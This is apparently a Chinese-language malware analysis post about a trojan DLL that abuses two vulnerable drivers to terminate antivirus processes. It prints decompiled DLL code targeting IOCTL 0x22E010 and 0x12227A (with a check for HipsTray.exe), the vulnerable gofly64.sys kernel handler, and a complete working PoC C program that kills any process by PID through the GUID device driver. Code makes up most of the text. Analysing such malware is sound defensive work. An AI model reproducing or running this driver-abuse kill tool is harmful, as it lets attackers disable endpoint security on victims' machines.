看了下，木马 DLL 一共利用 2 个漏洞驱动来杀杀软，一个是 https://github.com/j3h4ck/PoisonKiller/
dwIoControlCode = 0x22E010;
sub_180018948(&lpFileName, L"\\\\.\\{F8284233-48F4-4680-ADDD-F8284233}");
v0 = sub_18001CA64(v16, 5i64);
v1 = sub_180023D40(v20);
v2 = sub_180001948(v19, v1, L"drv_");
LOBYTE(v3) = v21;
sub_18000A08C(v17, v3, v2, v0);
v4 = sub_180001948(v18, v17, L".sys");
if ( &xmmword_1800A8C48 != (__int128 *)v4 )
{
sub_180004C64(&xmmword_1800A8C48);
xmmword_1800A8C48 = *(_OWORD *)v4;
xmmword_1800A8C58 = *(_OWORD *)(v4 + 16);
*(_QWORD *)(v4 + 16) = 0i64;
*(_QWORD *)(v4 + 24) = 7i64;
*(_WORD *)v4 = 0;
}
sub_180004C64(v18);
sub_180004C64(v17);
sub_180004C64(v19);
sub_180004C64(v20);
sub_180004C64(v16);
对应的 PoC 代码（来自上述仓库）：
// GUID Driver Killer - Process Termination via GUID Device Driver
// IOCTL: 0x22E010
// Input: ASCII string PID
// Discovered by @j3h4ck
#include <windows.h>
#include <stdio.h>
#define DEVICE_PATH L"\\\\.\\{F8284233-48F4-4680-ADDD-F8284233}"
#define IOCTL_KILL 0x22E010
/*
 * PoC entry point (as published): opens the symbolic link DEVICE_PATH
 * exposed by the vulnerable driver and sends IOCTL_KILL with the target
 * PID passed as a NUL-terminated ASCII decimal string.
 *
 * From a defender's point of view the two observable artifacts are the
 * CreateFileW() on "\\.\{F8284233-48F4-4680-ADDD-F8284233}" and the
 * DeviceIoControl() with control code 0x22E010 — both are what the
 * decompiled DLL above (dwIoControlCode = 0x22E010, lpFileName = the same
 * GUID path) reproduces.
 *
 * argv[1]: PID as decimal text.
 * Returns 1 on every path, including success (see note at the end).
 */
int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: %s <PID>\n", argv[0]);
printf("Example: %s 1234\n", argv[0]);
return 1;
}
/* atoi() reports neither non-numeric input nor overflow; only a literal
 * 0 / unparsable value is rejected by the check below. */
DWORD pid = atoi(argv[1]);
if (pid == 0) {
printf("[-] Invalid PID\n");
return 1;
}
printf(" Target PID: %d\n", pid);
/* Open the driver's device object by its symbolic link. No share mode,
 * no special flags — a plain user-mode handle open. */
HANDLE hDevice = CreateFileW(
DEVICE_PATH,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
/* GetLastError() returns a DWORD; "%d" is a signed-int specifier
 * (format/argument mismatch, cosmetic here). */
printf("[-] Failed to open device: %d\n", GetLastError());
return 1;
}
printf("[+] Device opened\n");
/* Input buffer for the IOCTL: the PID rendered as ASCII text, as stated
 * in the header comment ("Input: ASCII string PID"). */
char pidStr[16];
sprintf_s(pidStr, sizeof(pidStr), "%d", pid);
/* Output buffer, zero-filled so the later "%s" has a terminator unless
 * the driver writes all 16 bytes. */
char output[16] = { 0 };
DWORD bytesReturned;
printf(" Sending kill command...\n");
/* Input length is strlen()+1 so the terminating NUL is part of the
 * request; sizeof(output) bounds what the driver may write back. */
if (!DeviceIoControl(hDevice, IOCTL_KILL, pidStr, strlen(pidStr) + 1, output, sizeof(output), &bytesReturned, NULL
)) {
printf("[-] IOCTL failed: %d\n", GetLastError());
CloseHandle(hDevice);
return 1;
}
/* NOTE(review): if the driver fills all 16 bytes of output without a NUL,
 * this "%s" reads past the buffer — bytesReturned is never consulted. */
printf(" Driver response: %s\n", output);
CloseHandle(hDevice);
printf("[+] Process terminated\n");
/* NOTE(review): returns 1 on the success path as well, so callers cannot
 * distinguish success from failure by exit code. */
return 1;
}
另一个是南京偲言睿网络科技有限公司的 gofly64.sys：
if ( !(unsigned int)sub_1800228D0("HipsTray.exe") )
{
dword_1800AA784 = 0;
dwIoControlCode = 0x12227A;
sub_180018948(&lpFileName, L"\\\\.\\GoFly");
v7 = sub_18001CA64(v18, 5i64);
v8 = sub_180023D40(v19);
v9 = sub_180001948(v20, v8, L"drv_");
LOBYTE(v10) = v21;
sub_18000A08C(v17, v10, v9, v7);
v11 = sub_180001948(v16, v17, L".sys");
if ( &xmmword_1800A8C48 != (__int128 *)v11 )
{
if ( *((_QWORD *)&xmmword_1800A8C58 + 1) > 7ui64 )
{
v12 = (void *)xmmword_1800A8C48;
if ( (unsigned __int64)(2i64 * *((_QWORD *)&xmmword_1800A8C58 + 1) + 2) >= 0x1000 )
{
if ( (unsigned __int64)(xmmword_1800A8C48 - *(_QWORD *)(xmmword_1800A8C48 - 8) - 8) > 0x1F )
{
sub_18002F204(0i64, 0i64, 0i64, 0i64, 0i64);
goto LABEL_24;
}
v12 = *(void **)(xmmword_1800A8C48 - 8);
}
sub_18002916C(v12);
}
对应驱动中处理该 IOCTL（0x12227A）的代码：
else if ( v27 == 0x12227A )
{
if ( Src )
{
if ( MaxCount >= 4ui64 )
{
v53 = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);
if ( v53 != PsGetCurrentProcessId() )
{
ProcessHandle = 0i64;
ClientId.UniqueProcess = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);
ClientId.UniqueThread = 0i64;
ObjectAttributes.Length = 48;
memset(&ObjectAttributes.RootDirectory, 0, 20);
ObjectAttributes.SecurityDescriptor = 0i64;
ObjectAttributes.SecurityQualityOfService = 0i64;
v11 = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);
if ( v11 >= 0 )
{
ZwTerminateProcess(ProcessHandle, 0);
ZwClose(ProcessHandle);
}
}
}
}
} |